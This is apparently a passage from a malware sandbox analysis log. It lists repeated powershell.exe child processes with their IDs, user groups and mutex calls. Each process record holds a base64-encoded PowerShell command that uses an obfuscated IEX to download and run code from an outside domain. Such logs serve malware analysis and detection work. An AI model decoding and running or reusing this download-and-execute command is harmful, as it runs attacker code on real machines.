	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1281
	os_tid = 0x1ce4

	[0696.527] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1376
	os_tid = 0x1f48


Thread:
	id = 1403
	os_tid = 0x1fd8


Process:
	id = "216"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x68f29000"
	os_pid = "0x1d00"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "56"
	os_parent_pid = "0xefc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1284
	os_tid = 0x1d04

	[0655.534] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1346
	os_tid = 0x1e7c


Thread:
	id = 1350
	os_tid = 0x1e9c


Thread:
	id = 1817
	os_tid = 0x2138


Thread:
	id = 1826
	os_tid = 0x1c48


Thread:
	id = 1838
	os_tid = 0x2434


Thread:
	id = 1987
	os_tid = 0x26f4


Process:
	id = "217"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x11c84000"
	os_pid = "0x1d08"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "74"
	os_parent_pid = "0xd28"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1285
	os_tid = 0x1d0c

	[0655.458] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1347
	os_tid = 0x1e80


Thread:
	id = 1351
	os_tid = 0x1ea0


Thread:
	id = 1803
	os_tid = 0x2074


Thread:
	id = 1805
	os_tid = 0x2078


Thread:
	id = 1827
	os_tid = 0x22d4


Thread:
	id = 1963
	os_tid = 0x2694


Process:
	id = "218"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3d0ec000"
	os_pid = "0x1d24"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1289
	os_tid = 0x1d28

	[0696.780] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1415
	os_tid = 0x18d8


Thread:
	id = 1450
	os_tid = 0x1b78


Thread:
	id = 1727
	os_tid = 0x1fd8


Thread:
	id = 1733
	os_tid = 0x1ac0


Thread:
	id = 1771
	os_tid = 0x1ca8


Thread:
	id = 1874
	os_tid = 0x24e8


Process:
	id = "219"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5fcf9000"
	os_pid = "0x1d70"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1303
	os_tid = 0x1d74

	[0702.434] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1411
	os_tid = 0x1ffc


Thread:
	id = 1442
	os_tid = 0x1818


Thread:
	id = 1807
	os_tid = 0x207c


Thread:
	id = 1812
	os_tid = 0x1d18


Thread:
	id = 1823
	os_tid = 0x21bc


Thread:
	id = 1947
	os_tid = 0x2658


Process:
	id = "220"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1a07000"
	os_pid = "0x1da4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1311
	os_tid = 0x1da8

	[0709.651] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1424
	os_tid = 0x18e0


Thread:
	id = 1455
	os_tid = 0x1a58


Thread:
	id = 1746
	os_tid = 0x19fc


Thread:
	id = 1754
	os_tid = 0x1614


Thread:
	id = 1795
	os_tid = 0x1b98


Thread:
	id = 1892
	os_tid = 0x2554


Process:
	id = "221"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x63c4d000"
	os_pid = "0x1db0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "27"
	os_parent_pid = "0x5b4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1313
	os_tid = 0x1db4

	[0684.542] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1365
	os_tid = 0x1f04


Thread:
	id = 1385
	os_tid = 0x1f74


Thread:
	id = 2011
	os_tid = 0x275c


Thread:
	id = 2023
	os_tid = 0x278c


Thread:
	id = 2026
	os_tid = 0x2798


Thread:
	id = 2078
	os_tid = 0x24e4


Process:
	id = "222"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x22816000"
	os_pid = "0x1df4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1325
	os_tid = 0x1df8

	[0709.849] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1436
	os_tid = 0x1698


Thread:
	id = 1464
	os_tid = 0x1a5c


Thread:
	id = 1846
	os_tid = 0x2460


Thread:
	id = 1849
	os_tid = 0x246c


Thread:
	id = 1878
	os_tid = 0x2500


Thread:
	id = 2004
	os_tid = 0x2740


Process:
	id = "223"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x48d23000"
	os_pid = "0x1e24"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1333
	os_tid = 0x1e28

	[0710.098] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1425
	os_tid = 0x1c28


Thread:
	id = 1456
	os_tid = 0x1038


Process:
	id = "224"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x36332000"
	os_pid = "0x1e60"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1342
	os_tid = 0x1e64

	[0729.565] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1481
	os_tid = 0x1ac4


Thread:
	id = 1493
	os_tid = 0x1ca0


Thread:
	id = 1866
	os_tid = 0x24bc


Thread:
	id = 1873
	os_tid = 0x24dc


Thread:
	id = 1886
	os_tid = 0x2528


Thread:
	id = 2029
	os_tid = 0x27a4


Process:
	id = "225"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1f83f000"
	os_pid = "0x1e90"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1348
	os_tid = 0x1e94

	[0715.289] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1439
	os_tid = 0x13e4


Thread:
	id = 1471
	os_tid = 0x1a8c


Thread:
	id = 1910
	os_tid = 0x25b4


Thread:
	id = 1921
	os_tid = 0x25e8


Thread:
	id = 1951
	os_tid = 0x2668


Thread:
	id = 2066
	os_tid = 0x1dc4


Process:
	id = "226"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0xa36d000"
	os_pid = "0x1ec8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1356
	os_tid = 0x1ecc

	[0794.058] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1800
	os_tid = 0x1ec0


Thread:
	id = 1806
	os_tid = 0x1900


Process:
	id = "227"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x68d5c000"
	os_pid = "0x1f14"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1366
	os_tid = 0x1f18

	[0826.418] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1850
	os_tid = 0x2470


Thread:
	id = 1875
	os_tid = 0x24ec


Process:
	id = "228"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x966a000"
	os_pid = "0x1f80"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1387
	os_tid = 0x1f84

	[0795.263] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1820
	os_tid = 0x1c74


Thread:
	id = 1835
	os_tid = 0x2424


Process:
	id = "229"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x79a76000"
	os_pid = "0x1f8c"
